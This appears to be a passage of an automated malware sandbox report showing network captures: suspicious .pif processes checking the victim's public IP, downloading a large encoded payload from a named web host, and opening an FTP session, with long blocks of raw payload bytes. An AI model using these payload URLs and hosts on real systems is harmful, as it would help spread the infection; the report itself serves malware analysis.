                                                                                            2024-10-30 07:35:12 UTC8000INData Raw: 45 4a 4a 6a 7a 39 34 43 75 46 57 61 2b 35 49 6d 4b 4e 49 4d 38 2f 4e 72 31 30 70 74 6d 4e 58 33 49 4c 52 6f 6b 31 35 31 49 70 52 39 67 66 6a 5a 2f 6b 6b 79 76 4e 55 50 4d 4f 49 4c 6b 73 39 73 53 76 4a 31 58 4e 78 45 35 62 7a 6c 64 38 4b 41 69 44 77 63 69 33 4d 69 30 6d 78 42 57 38 73 4a 52 6c 2f 41 78 4a 55 51 4f 4b 5a 30 57 76 75 49 73 59 75 75 68 6e 47 53 51 33 70 36 62 51 32 68 56 62 4f 43 32 52 48 73 64 61 7a 4a 59 41 54 48 77 77 2f 4c 56 32 51 55 64 61 65 6f 31 66 65 38 4f 68 77 6c 33 6c 64 39 49 69 36 7a 52 66 59 6d 6f 43 30 34 67 66 77 56 7a 78 44 30 59 78 67 49 70 74 30 56 47 63 70 6e 42 66 35 50 78 77 35 59 44 4c 30 39 31 45 43 58 30 63 45 73 44 78 57 51 7a 67 39 50 6f 42 68 76 41 6b 73 30 78 5a 47 61 35 45 78 57 5a 71 72 51 69 48 6a 51 38 63 56
                                                                                            Data Ascii: EJJjz94CuFWa+5ImKNIM8/Nr10ptmNX3ILRok151IpR9gfjZ/kkyvNUPMOILks9sSvJ1XNxE5bzld8KAiDwci3Mi0mxBW8sJRl/AxJUQOKZ0WvuIsYuuhnGSQ3p6bQ2hVbOC2RHsdazJYATHww/LV2QUdaeo1fe8Ohwl3ld9Ii6zRfYmoC04gfwVzxD0YxgIpt0VGcpnBf5Pxw5YDL091ECX0cEsDxWQzg9PoBhvAks0xZGa5ExWZqrQiHjQ8cV
                                                                                            2024-10-30 07:35:12 UTC8000INData Raw: 65 31 52 79 54 4f 6c 72 6d 57 66 61 43 6a 4a 55 56 36 44 49 2f 69 7a 69 56 52 38 4e 37 31 4c 35 59 52 2b 59 62 4b 53 79 70 6f 63 2f 63 6c 71 66 6a 6c 54 58 52 49 58 30 67 48 72 34 76 6e 5a 70 63 4b 34 72 4f 2b 31 37 63 78 4c 45 76 66 71 6d 72 36 6c 59 33 4d 76 4e 73 65 36 41 52 4b 7a 4c 4f 4d 31 76 44 46 6b 5a 4f 75 6a 35 67 51 77 52 76 6f 61 55 74 78 36 41 6f 64 53 62 70 48 6b 58 55 67 4c 43 35 79 7a 74 66 54 32 6e 47 30 7a 6a 79 4b 4f 6f 6e 64 44 7a 64 64 6e 42 66 79 39 50 58 68 57 71 54 6f 4a 7a 4d 2b 76 75 6e 5a 6a 79 75 38 51 75 37 6b 6b 4e 30 57 48 4d 56 45 33 54 65 6b 2b 41 30 48 2b 50 57 68 55 33 43 4d 33 61 76 54 2b 4e 4a 2f 6f 33 6c 64 4b 6e 52 30 39 58 4f 2b 69 62 39 41 38 58 36 46 6a 37 4c 67 4e 46 73 5a 64 61 6f 34 64 6b 36 50 37 6d 63 39 4b
                                                                                            Data Ascii: e1RyTOlrmWfaCjJUV6DI/iziVR8N71L5YR+YbKSypoc/clqfjlTXRIX0gHr4vnZpcK4rO+17cxLEvfqmr6lY3MvNse6ARKzLOM1vDFkZOuj5gQwRvoaUtx6AodSbpHkXUgLC5yztfT2nG0zjyKOondDzddnBfy9PXhWqToJzM+vunZjyu8Qu7kkN0WHMVE3Tek+A0H+PWhU3CM3avT+NJ/o3ldKnR09XO+ib9A8X6Fj7LgNFsZdao4dk6P7mc9K
                                                                                            2024-10-30 07:35:12 UTC8000INData Raw: 43 6e 71 47 70 53 68 57 4c 30 41 78 6a 69 67 41 4e 4b 61 41 55 6a 35 47 63 49 46 44 34 70 65 61 68 4f 6a 70 42 4a 6f 67 38 47 78 74 61 64 64 50 49 35 53 62 73 36 38 7a 61 6a 33 67 58 62 6c 63 4f 59 75 57 4a 32 73 32 44 6b 79 4a 72 37 65 4a 32 35 62 4e 48 78 39 58 6e 66 51 2f 75 77 66 4c 4f 48 32 73 37 53 78 67 77 46 2f 31 4a 62 4b 35 35 50 6a 56 4a 53 35 4d 33 71 55 46 75 76 51 4e 4f 4e 50 67 68 4b 75 35 5a 67 74 4f 38 4f 44 79 66 78 35 63 73 2b 32 45 33 45 50 47 31 6e 30 37 2b 6b 47 71 55 70 5a 45 46 46 68 61 73 4e 79 43 63 45 4d 77 43 58 38 41 39 68 33 61 54 73 73 56 39 68 30 53 62 5a 32 58 69 5a 4c 64 34 73 74 79 6d 68 33 64 33 68 52 64 51 36 77 54 4f 67 2b 6d 44 61 6a 75 6c 4f 57 4e 79 44 43 36 79 53 36 68 54 67 72 67 62 58 56 30 7a 73 53 43 4b 45 32
                                                                                            Data Ascii: CnqGpShWL0AxjigANKaAUj5GcIFD4peahOjpBJog8GxtaddPI5Sbs68zaj3gXblcOYuWJ2s2DkyJr7eJ25bNHx9XnfQ/uwfLOH2s7SxgwF/1JbK55PjVJS5M3qUFuvQNONPghKu5ZgtO8ODyfx5cs+2E3EPG1n07+kGqUpZEFFhasNyCcEMwCX8A9h3aTssV9h0SbZ2XiZLd4stymh3d3hRdQ6wTOg+mDajulOWNyDC6yS6hTgrgbXV0zsSCKE2
                                                                                            2024-10-30 07:35:12 UTC8000INData Raw: 41 70 76 62 61 4b 6e 70 51 4b 50 79 71 44 51 71 66 67 79 79 5a 39 4d 58 42 39 6c 33 6a 48 6b 66 37 4d 70 37 6b 4a 71 63 64 72 62 76 79 4d 32 2b 2b 49 54 71 67 64 68 75 76 50 72 32 59 6b 51 34 46 65 74 4c 41 44 31 6d 4f 31 65 69 4c 35 48 6a 57 5a 69 55 36 55 6b 50 58 61 53 2f 57 33 53 2b 39 31 67 4d 43 50 77 76 2b 51 4a 33 43 4c 31 6b 6a 67 32 4b 35 77 72 36 50 79 61 39 65 35 55 48 74 32 4b 75 32 70 42 49 4e 4d 46 2f 72 4b 42 32 74 69 50 4d 39 6b 68 6b 43 6f 48 6c 2f 67 57 47 4d 55 64 4c 70 61 39 4c 34 50 72 5a 64 62 56 64 78 52 52 77 78 57 43 51 70 4e 67 38 66 5a 39 64 43 6c 66 61 39 75 4f 33 57 58 32 4d 6a 6a 4c 70 6d 73 61 6f 43 43 6f 46 33 53 70 70 45 44 58 76 4a 6e 6f 6c 64 7a 41 2b 30 72 56 63 68 75 4a 53 44 68 39 54 6b 6f 55 68 78 37 72 44 67 57 53
                                                                                            Data Ascii: ApvbaKnpQKPyqDQqfgyyZ9MXB9l3jHkf7Mp7kJqcdrbvyM2++ITqgdhuvPr2YkQ4FetLAD1mO1eiL5HjWZiU6UkPXaS/W3S+91gMCPwv+QJ3CL1kjg2K5wr6Pya9e5UHt2Ku2pBINMF/rKB2tiPM9khkCoHl/gWGMUdLpa9L4PrZdbVdxRRwxWCQpNg8fZ9dClfa9uO3WX2MjjLpmsaoCCoF3SppEDXvJnoldzA+0rVchuJSDh9TkoUhx7rDgWS
                                                                                            2024-10-30 07:35:12 UTC8000INData Raw: 69 77 38 72 36 48 2f 78 39 44 4f 62 67 6e 73 53 6d 34 79 4b 36 4e 63 4f 6b 36 66 76 4a 46 56 4e 34 7a 41 68 50 2f 4f 4a 6f 69 7a 34 68 2f 4a 54 31 6b 71 53 7a 31 48 61 75 63 41 65 70 53 68 52 2f 53 71 37 49 6f 2b 48 54 43 72 76 55 59 4b 6c 48 5a 53 47 45 6d 65 66 32 6a 70 46 44 61 41 52 58 48 66 41 6d 68 7a 37 6a 59 76 54 54 67 48 44 41 64 53 4c 65 52 69 32 34 56 4f 63 44 74 46 72 6f 4c 46 50 52 39 32 4f 72 71 66 51 6c 77 4f 42 4f 34 78 39 57 51 76 42 62 4e 37 2f 54 4e 7a 72 50 6b 2f 71 33 31 34 6e 69 57 56 77 53 7a 36 49 67 31 45 70 6d 2b 31 44 58 54 33 53 50 47 2b 70 46 76 50 65 48 74 38 48 5a 73 2b 66 6a 6e 6a 2f 4a 67 78 6e 4f 72 55 67 49 53 65 43 78 44 55 38 70 71 70 48 43 75 78 49 49 52 69 42 35 42 78 32 73 46 64 33 78 78 69 67 78 56 41 32 38 31 64
                                                                                            Data Ascii: iw8r6H/x9DObgnsSm4yK6NcOk6fvJFVN4zAhP/OJoiz4h/JT1kqSz1HaucAepShR/Sq7Io+HTCrvUYKlHZSGEmef2jpFDaARXHfAmhz7jYvTTgHDAdSLeRi24VOcDtFroLFPR92OrqfQlwOBO4x9WQvBbN7/TNzrPk/q314niWVwSz6Ig1Epm+1DXT3SPG+pFvPeHt8HZs+fjnj/JgxnOrUgISeCxDU8pqpHCuxIIRiB5Bx2sFd3xxigxVA281d


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.449740172.67.74.1524434108C:\Users\Public\Libraries\xrbjyllC.pif
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-30 07:35:17 UTC155OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                            Host: api.ipify.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-30 07:35:17 UTC211INHTTP/1.1 200 OK
                                                                                            Date: Wed, 30 Oct 2024 07:35:17 GMT
                                                                                            Content-Type: text/plain
                                                                                            Content-Length: 14
                                                                                            Connection: close
                                                                                            Vary: Origin
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8da9ba509b14e80f-DFW
                                                                                            2024-10-30 07:35:17 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38
                                                                                            Data Ascii: 173.254.250.78


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.44975150.116.93.1854431068C:\Users\Public\Libraries\Cllyjbrx.PIF
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-30 07:35:29 UTC174OUTGET /origins/233_Cllyjbrxmng HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                            Host: himalayastrek.com
                                                                                            2024-10-30 07:35:29 UTC209INHTTP/1.1 200 OK
                                                                                            Date: Wed, 30 Oct 2024 07:35:29 GMT
                                                                                            Server: Apache
                                                                                            Upgrade: h2,h2c
                                                                                            Connection: Upgrade, close
                                                                                            Last-Modified: Wed, 30 Oct 2024 06:08:38 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 768392
                                                                                            2024-10-30 07:35:29 UTC7983INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 4f 45 69 49 54 48 53 63 6d 48 53 55 65 48 53 4d 55 44 68 59 56 49 52 30 62 45 68 6b 69 45 78 41 68 45 78 4d 65 49 52 41 67 4a 68 38 64 49 68 55 64 46 42 30 6e 44 67 34 69 45 42 6b 6d 4a 78 38 68 49 53 59 6a 45 52 79 6d 72 71 56 5a 49 36 65 78 53 30 34 5a 47 53 59 58 44 78 38 6c 47 68 73 55 70 71 36 6c 57 53 4f 6e 73 55 76 30 2b 35 6f 43 54 76 72 79 37 74 33 6b 35 70 6e 66 36 75 66 74 36 65 61 42 41 77 7a 74 35 64 33 70 2b 2f 69 57 37 4f 6a 74 33 4f 66 6d 6d 67 68 4f 33 2f 76 30 39 50 54 72 68 4f 54 79 39 4f 66 70 36 6f 35 51 42 4f 66 71 34 2b 6a 37 35 6f 33 35 2b 2f 62 6b 35 65 69 49 2f 77 66 6f 39 2b 37 7a 2b 50 4b 61 33 75 6a 79 2b 2f 76 6e 6d 2f 31 4c 2b 66 6e 75 36 4f 33 6d 69 50 44 78 33 2f 54 6f 39 59 4e 56 56 50 4c
                                                                                            Data Ascii: pq6lWSOnsUsOEiITHScmHSUeHSMUDhYVIR0bEhkiExAhExMeIRAgJh8dIhUdFB0nDg4iEBkmJx8hISYjERymrqVZI6exS04ZGSYXDx8lGhsUpq6lWSOnsUv0+5oCTvry7t3k5pnf6uft6eaBAwzt5d3p+/iW7Ojt3OfmmghO3/v09PTrhOTy9Ofp6o5QBOfq4+j75o35+/bk5eiI/wfo9+7z+PKa3ujy+/vnm/1L+fnu6O3miPDx3/To9YNVVPL
                                                                                            2024-10-30 07:35:29 UTC8000INData Raw: 67 6c 73 44 36 46 56 69 57 31 6d 54 4d 71 73 70 62 37 34 68 51 38 71 68 52 62 48 55 66 74 70 62 38 69 55 6d 62 4d 59 74 71 30 62 61 39 55 53 6a 44 66 61 76 4c 64 30 4d 45 53 4a 34 31 7a 63 47 67 70 68 5a 68 36 56 72 6f 35 4e 35 58 56 74 37 33 52 69 37 73 63 4d 73 32 7a 58 38 44 36 4c 4f 70 35 66 6c 4a 57 70 4d 50 76 4d 39 54 74 48 64 7a 70 50 57 41 6b 64 69 2b 5a 4f 72 5a 48 31 73 55 74 56 51 59 6a 78 4f 42 46 48 62 34 45 2f 6c 55 2f 48 34 46 57 62 55 66 36 6a 38 78 76 32 64 42 4c 56 70 69 48 67 57 46 44 6f 4a 79 56 76 41 54 5a 51 69 4d 39 50 39 5a 79 74 42 4f 33 61 77 77 6a 57 73 34 48 37 50 66 53 50 2b 45 51 4e 79 43 35 41 32 70 2b 68 63 72 2f 2f 6a 4c 6c 46 6c 67 77 48 48 4e 51 54 4c 30 4c 35 77 59 79 32 36 41 66 6f 2f 6c 4b 6e 48 2f 42 64 2b 6d 79 71
                                                                                            Data Ascii: glsD6FViW1mTMqspb74hQ8qhRbHUftpb8iUmbMYtq0ba9USjDfavLd0MESJ41zcGgphZh6Vro5N5XVt73Ri7scMs2zX8D6LOp5flJWpMPvM9TtHdzpPWAkdi+ZOrZH1sUtVQYjxOBFHb4E/lU/H4FWbUf6j8xv2dBLVpiHgWFDoJyVvATZQiM9P9ZytBO3awwjWs4H7PfSP+EQNyC5A2p+hcr//jLlFlgwHHNQTL0L5wYy26Afo/lKnH/Bd+myq
                                                                                            2024-10-30 07:35:29 UTC8000INData Raw: 6c 6b 32 70 75 71 4b 6a 69 42 59 4b 44 4c 4b 67 66 33 50 52 6f 58 41 64 35 2b 4d 46 4d 45 2f 32 64 4f 76 47 6f 6c 43 33 51 7a 4e 55 70 4f 6d 4e 73 4f 67 6a 2f 69 58 75 53 53 46 68 74 58 45 74 6a 78 36 32 63 54 36 7a 47 6d 68 6b 30 36 41 51 32 35 56 77 4e 6f 66 69 68 36 4a 4c 49 31 37 50 42 45 55 4e 7a 52 71 38 32 42 47 56 73 61 67 6e 6d 48 78 74 69 5a 57 30 74 46 78 71 4e 69 67 5a 6e 7a 79 31 74 4d 62 4f 2b 62 48 45 73 78 7a 50 71 52 62 56 4c 42 2b 69 32 31 42 4c 53 64 41 53 76 6d 52 62 6c 47 4a 70 63 36 31 43 61 5a 4c 71 38 61 54 47 57 7a 6d 75 49 48 61 6d 31 75 43 6c 72 4c 39 34 54 65 59 57 55 4c 6d 48 42 67 2f 30 2f 5a 4e 33 4b 69 79 2f 74 30 6e 37 62 75 72 68 36 66 53 46 52 70 38 52 54 59 6f 55 49 6e 61 33 79 47 72 79 59 66 57 42 5a 50 5a 39 68 57 33
                                                                                            Data Ascii: lk2puqKjiBYKDLKgf3PRoXAd5+MFME/2dOvGolC3QzNUpOmNsOgj/iXuSSFhtXEtjx62cT6zGmhk06AQ25VwNofih6JLI17PBEUNzRq82BGVsagnmHxtiZW0tFxqNigZnzy1tMbO+bHEsxzPqRbVLB+i21BLSdASvmRblGJpc61CaZLq8aTGWzmuIHam1uClrL94TeYWULmHBg/0/ZN3Kiy/t0n7burh6fSFRp8RTYoUIna3yGryYfWBZPZ9hW3
                                                                                            2024-10-30 07:35:29 UTC8000INData Raw: 32 73 55 64 58 63 30 79 45 62 35 58 70 37 5a 52 53 5a 38 58 30 58 6b 6c 6e 4e 62 75 37 79 44 61 67 68 6c 72 48 61 73 6f 34 71 50 52 57 37 6c 78 4b 51 50 78 4a 73 57 4e 46 63 6c 67 47 36 6a 76 59 61 35 4a 31 67 70 57 79 59 78 66 74 37 79 46 64 4a 30 6d 4a 55 68 73 54 4e 39 2b 47 64 4a 2f 51 66 38 33 54 61 61 44 4e 70 70 68 33 73 6e 37 4a 78 50 34 41 54 51 65 63 48 48 5a 48 47 6a 49 6e 33 62 4a 45 70 37 55 76 38 62 6c 61 74 6d 73 65 2b 45 43 73 2b 59 75 73 47 48 36 4a 42 2f 6c 56 62 76 68 63 68 73 6a 63 56 7a 69 32 5a 51 56 79 56 72 71 34 68 43 66 6c 61 55 62 76 50 41 38 72 48 31 73 78 4a 4f 6c 33 45 73 53 4c 37 4e 2f 76 77 35 2b 66 79 49 4b 74 46 71 6e 39 39 46 6e 30 30 6b 4b 54 7a 44 74 2f 55 32 41 62 72 2b 53 6f 39 6a 62 74 44 32 46 71 38 72 71 69 6d 43
                                                                                            Data Ascii: 2sUdXc0yEb5Xp7ZRSZ8X0XklnNbu7yDaghlrHaso4qPRW7lxKQPxJsWNFclgG6jvYa5J1gpWyYxft7yFdJ0mJUhsTN9+GdJ/Qf83TaaDNpph3sn7JxP4ATQecHHZHGjIn3bJEp7Uv8blatmse+ECs+YusGH6JB/lVbvhchsjcVzi2ZQVyVrq4hCflaUbvPA8rH1sxJOl3EsSL7N/vw5+fyIKtFqn99Fn00kKTzDt/U2Abr+So9jbtD2Fq8rqimC
                                                                                            2024-10-30 07:35:29 UTC8000INData Raw: 68 51 71 2f 44 74 70 44 54 39 2f 71 6c 44 77 5a 41 77 54 78 58 66 68 41 61 51 44 62 69 48 67 32 4b 77 75 37 38 62 76 2b 65 75 70 51 6f 67 64 4b 56 6b 30 46 50 6d 46 2f 51 55 76 34 38 52 72 30 37 5a 77 2b 6e 55 52 49 6c 4b 5a 47 49 43 73 42 35 63 6e 34 56 42 41 58 31 77 6f 78 6a 59 39 45 50 54 77 63 48 62 65 32 45 39 34 46 39 48 71 44 6b 36 6d 6b 61 44 2f 47 65 47 47 44 2f 6e 76 34 59 76 77 51 62 69 6d 66 63 43 4f 39 39 52 30 71 4e 4c 43 75 51 55 78 61 73 43 42 4c 46 74 5a 31 33 71 59 4b 52 4d 79 66 43 4b 71 42 58 35 70 30 43 44 66 79 5a 56 30 57 75 48 30 6f 6c 4b 5a 50 50 55 31 59 67 56 37 39 69 4c 66 64 2b 49 7a 77 6b 61 62 38 2f 79 69 75 46 4d 32 6d 59 44 33 51 30 64 35 49 67 47 68 32 57 6b 46 69 6b 4a 4d 58 4c 78 46 76 42 31 7a 61 4b 7a 4f 2b 58 41 33
                                                                                            Data Ascii: hQq/DtpDT9/qlDwZAwTxXfhAaQDbiHg2Kwu78bv+eupQogdKVk0FPmF/QUv48Rr07Zw+nURIlKZGICsB5cn4VBAX1woxjY9EPTwcHbe2E94F9HqDk6mkaD/GeGGD/nv4YvwQbimfcCO99R0qNLCuQUxasCBLFtZ13qYKRMyfCKqBX5p0CDfyZV0WuH0olKZPPU1YgV79iLfd+Izwkab8/yiuFM2mYD3Q0d5IgGh2WkFikJMXLxFvB1zaKzO+XA3
                                                                                            2024-10-30 07:35:29 UTC8000INData Raw: 45 4a 4a 6a 7a 39 34 43 75 46 57 61 2b 35 49 6d 4b 4e 49 4d 38 2f 4e 72 31 30 70 74 6d 4e 58 33 49 4c 52 6f 6b 31 35 31 49 70 52 39 67 66 6a 5a 2f 6b 6b 79 76 4e 55 50 4d 4f 49 4c 6b 73 39 73 53 76 4a 31 58 4e 78 45 35 62 7a 6c 64 38 4b 41 69 44 77 63 69 33 4d 69 30 6d 78 42 57 38 73 4a 52 6c 2f 41 78 4a 55 51 4f 4b 5a 30 57 76 75 49 73 59 75 75 68 6e 47 53 51 33 70 36 62 51 32 68 56 62 4f 43 32 52 48 73 64 61 7a 4a 59 41 54 48 77 77 2f 4c 56 32 51 55 64 61 65 6f 31 66 65 38 4f 68 77 6c 33 6c 64 39 49 69 36 7a 52 66 59 6d 6f 43 30 34 67 66 77 56 7a 78 44 30 59 78 67 49 70 74 30 56 47 63 70 6e 42 66 35 50 78 77 35 59 44 4c 30 39 31 45 43 58 30 63 45 73 44 78 57 51 7a 67 39 50 6f 42 68 76 41 6b 73 30 78 5a 47 61 35 45 78 57 5a 71 72 51 69 48 6a 51 38 63 56
                                                                                            Data Ascii: EJJjz94CuFWa+5ImKNIM8/Nr10ptmNX3ILRok151IpR9gfjZ/kkyvNUPMOILks9sSvJ1XNxE5bzld8KAiDwci3Mi0mxBW8sJRl/AxJUQOKZ0WvuIsYuuhnGSQ3p6bQ2hVbOC2RHsdazJYATHww/LV2QUdaeo1fe8Ohwl3ld9Ii6zRfYmoC04gfwVzxD0YxgIpt0VGcpnBf5Pxw5YDL091ECX0cEsDxWQzg9PoBhvAks0xZGa5ExWZqrQiHjQ8cV
                                                                                            2024-10-30 07:35:29 UTC8000INData Raw: 65 31 52 79 54 4f 6c 72 6d 57 66 61 43 6a 4a 55 56 36 44 49 2f 69 7a 69 56 52 38 4e 37 31 4c 35 59 52 2b 59 62 4b 53 79 70 6f 63 2f 63 6c 71 66 6a 6c 54 58 52 49 58 30 67 48 72 34 76 6e 5a 70 63 4b 34 72 4f 2b 31 37 63 78 4c 45 76 66 71 6d 72 36 6c 59 33 4d 76 4e 73 65 36 41 52 4b 7a 4c 4f 4d 31 76 44 46 6b 5a 4f 75 6a 35 67 51 77 52 76 6f 61 55 74 78 36 41 6f 64 53 62 70 48 6b 58 55 67 4c 43 35 79 7a 74 66 54 32 6e 47 30 7a 6a 79 4b 4f 6f 6e 64 44 7a 64 64 6e 42 66 79 39 50 58 68 57 71 54 6f 4a 7a 4d 2b 76 75 6e 5a 6a 79 75 38 51 75 37 6b 6b 4e 30 57 48 4d 56 45 33 54 65 6b 2b 41 30 48 2b 50 57 68 55 33 43 4d 33 61 76 54 2b 4e 4a 2f 6f 33 6c 64 4b 6e 52 30 39 58 4f 2b 69 62 39 41 38 58 36 46 6a 37 4c 67 4e 46 73 5a 64 61 6f 34 64 6b 36 50 37 6d 63 39 4b
                                                                                            Data Ascii: e1RyTOlrmWfaCjJUV6DI/iziVR8N71L5YR+YbKSypoc/clqfjlTXRIX0gHr4vnZpcK4rO+17cxLEvfqmr6lY3MvNse6ARKzLOM1vDFkZOuj5gQwRvoaUtx6AodSbpHkXUgLC5yztfT2nG0zjyKOondDzddnBfy9PXhWqToJzM+vunZjyu8Qu7kkN0WHMVE3Tek+A0H+PWhU3CM3avT+NJ/o3ldKnR09XO+ib9A8X6Fj7LgNFsZdao4dk6P7mc9K
                                                                                            2024-10-30 07:35:29 UTC8000INData Raw: 43 6e 71 47 70 53 68 57 4c 30 41 78 6a 69 67 41 4e 4b 61 41 55 6a 35 47 63 49 46 44 34 70 65 61 68 4f 6a 70 42 4a 6f 67 38 47 78 74 61 64 64 50 49 35 53 62 73 36 38 7a 61 6a 33 67 58 62 6c 63 4f 59 75 57 4a 32 73 32 44 6b 79 4a 72 37 65 4a 32 35 62 4e 48 78 39 58 6e 66 51 2f 75 77 66 4c 4f 48 32 73 37 53 78 67 77 46 2f 31 4a 62 4b 35 35 50 6a 56 4a 53 35 4d 33 71 55 46 75 76 51 4e 4f 4e 50 67 68 4b 75 35 5a 67 74 4f 38 4f 44 79 66 78 35 63 73 2b 32 45 33 45 50 47 31 6e 30 37 2b 6b 47 71 55 70 5a 45 46 46 68 61 73 4e 79 43 63 45 4d 77 43 58 38 41 39 68 33 61 54 73 73 56 39 68 30 53 62 5a 32 58 69 5a 4c 64 34 73 74 79 6d 68 33 64 33 68 52 64 51 36 77 54 4f 67 2b 6d 44 61 6a 75 6c 4f 57 4e 79 44 43 36 79 53 36 68 54 67 72 67 62 58 56 30 7a 73 53 43 4b 45 32
                                                                                            Data Ascii: CnqGpShWL0AxjigANKaAUj5GcIFD4peahOjpBJog8GxtaddPI5Sbs68zaj3gXblcOYuWJ2s2DkyJr7eJ25bNHx9XnfQ/uwfLOH2s7SxgwF/1JbK55PjVJS5M3qUFuvQNONPghKu5ZgtO8ODyfx5cs+2E3EPG1n07+kGqUpZEFFhasNyCcEMwCX8A9h3aTssV9h0SbZ2XiZLd4stymh3d3hRdQ6wTOg+mDajulOWNyDC6yS6hTgrgbXV0zsSCKE2
                                                                                            2024-10-30 07:35:29 UTC8000INData Raw: 41 70 76 62 61 4b 6e 70 51 4b 50 79 71 44 51 71 66 67 79 79 5a 39 4d 58 42 39 6c 33 6a 48 6b 66 37 4d 70 37 6b 4a 71 63 64 72 62 76 79 4d 32 2b 2b 49 54 71 67 64 68 75 76 50 72 32 59 6b 51 34 46 65 74 4c 41 44 31 6d 4f 31 65 69 4c 35 48 6a 57 5a 69 55 36 55 6b 50 58 61 53 2f 57 33 53 2b 39 31 67 4d 43 50 77 76 2b 51 4a 33 43 4c 31 6b 6a 67 32 4b 35 77 72 36 50 79 61 39 65 35 55 48 74 32 4b 75 32 70 42 49 4e 4d 46 2f 72 4b 42 32 74 69 50 4d 39 6b 68 6b 43 6f 48 6c 2f 67 57 47 4d 55 64 4c 70 61 39 4c 34 50 72 5a 64 62 56 64 78 52 52 77 78 57 43 51 70 4e 67 38 66 5a 39 64 43 6c 66 61 39 75 4f 33 57 58 32 4d 6a 6a 4c 70 6d 73 61 6f 43 43 6f 46 33 53 70 70 45 44 58 76 4a 6e 6f 6c 64 7a 41 2b 30 72 56 63 68 75 4a 53 44 68 39 54 6b 6f 55 68 78 37 72 44 67 57 53
                                                                                            Data Ascii: ApvbaKnpQKPyqDQqfgyyZ9MXB9l3jHkf7Mp7kJqcdrbvyM2++ITqgdhuvPr2YkQ4FetLAD1mO1eiL5HjWZiU6UkPXaS/W3S+91gMCPwv+QJ3CL1kjg2K5wr6Pya9e5UHt2Ku2pBINMF/rKB2tiPM9khkCoHl/gWGMUdLpa9L4PrZdbVdxRRwxWCQpNg8fZ9dClfa9uO3WX2MjjLpmsaoCCoF3SppEDXvJnoldzA+0rVchuJSDh9TkoUhx7rDgWS
                                                                                            2024-10-30 07:35:29 UTC8000INData Raw: 69 77 38 72 36 48 2f 78 39 44 4f 62 67 6e 73 53 6d 34 79 4b 36 4e 63 4f 6b 36 66 76 4a 46 56 4e 34 7a 41 68 50 2f 4f 4a 6f 69 7a 34 68 2f 4a 54 31 6b 71 53 7a 31 48 61 75 63 41 65 70 53 68 52 2f 53 71 37 49 6f 2b 48 54 43 72 76 55 59 4b 6c 48 5a 53 47 45 6d 65 66 32 6a 70 46 44 61 41 52 58 48 66 41 6d 68 7a 37 6a 59 76 54 54 67 48 44 41 64 53 4c 65 52 69 32 34 56 4f 63 44 74 46 72 6f 4c 46 50 52 39 32 4f 72 71 66 51 6c 77 4f 42 4f 34 78 39 57 51 76 42 62 4e 37 2f 54 4e 7a 72 50 6b 2f 71 33 31 34 6e 69 57 56 77 53 7a 36 49 67 31 45 70 6d 2b 31 44 58 54 33 53 50 47 2b 70 46 76 50 65 48 74 38 48 5a 73 2b 66 6a 6e 6a 2f 4a 67 78 6e 4f 72 55 67 49 53 65 43 78 44 55 38 70 71 70 48 43 75 78 49 49 52 69 42 35 42 78 32 73 46 64 33 78 78 69 67 78 56 41 32 38 31 64
                                                                                            Data Ascii: iw8r6H/x9DObgnsSm4yK6NcOk6fvJFVN4zAhP/OJoiz4h/JT1kqSz1HaucAepShR/Sq7Io+HTCrvUYKlHZSGEmef2jpFDaARXHfAmhz7jYvTTgHDAdSLeRi24VOcDtFroLFPR92OrqfQlwOBO4x9WQvBbN7/TNzrPk/q314niWVwSz6Ig1Epm+1DXT3SPG+pFvPeHt8HZs+fjnj/JgxnOrUgISeCxDU8pqpHCuxIIRiB5Bx2sFd3xxigxVA281d


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.449752172.67.74.1524436568C:\Users\Public\Libraries\xrbjyllC.pif
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-30 07:35:34 UTC155OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                            Host: api.ipify.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-30 07:35:34 UTC211INHTTP/1.1 200 OK
                                                                                            Date: Wed, 30 Oct 2024 07:35:34 GMT
                                                                                            Content-Type: text/plain
                                                                                            Content-Length: 14
                                                                                            Connection: close
                                                                                            Vary: Origin
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8da9bab9b87de97a-DFW
                                                                                            2024-10-30 07:35:34 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38
                                                                                            Data Ascii: 173.254.250.78


                                                                                            FTP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                                            Oct 30, 2024 08:35:09.569416046 CET2149734110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.
                                                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 15:35. Server port: 21.
                                                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 15:35. Server port: 21.220-This is a private system - No anonymous login
                                                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 15:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
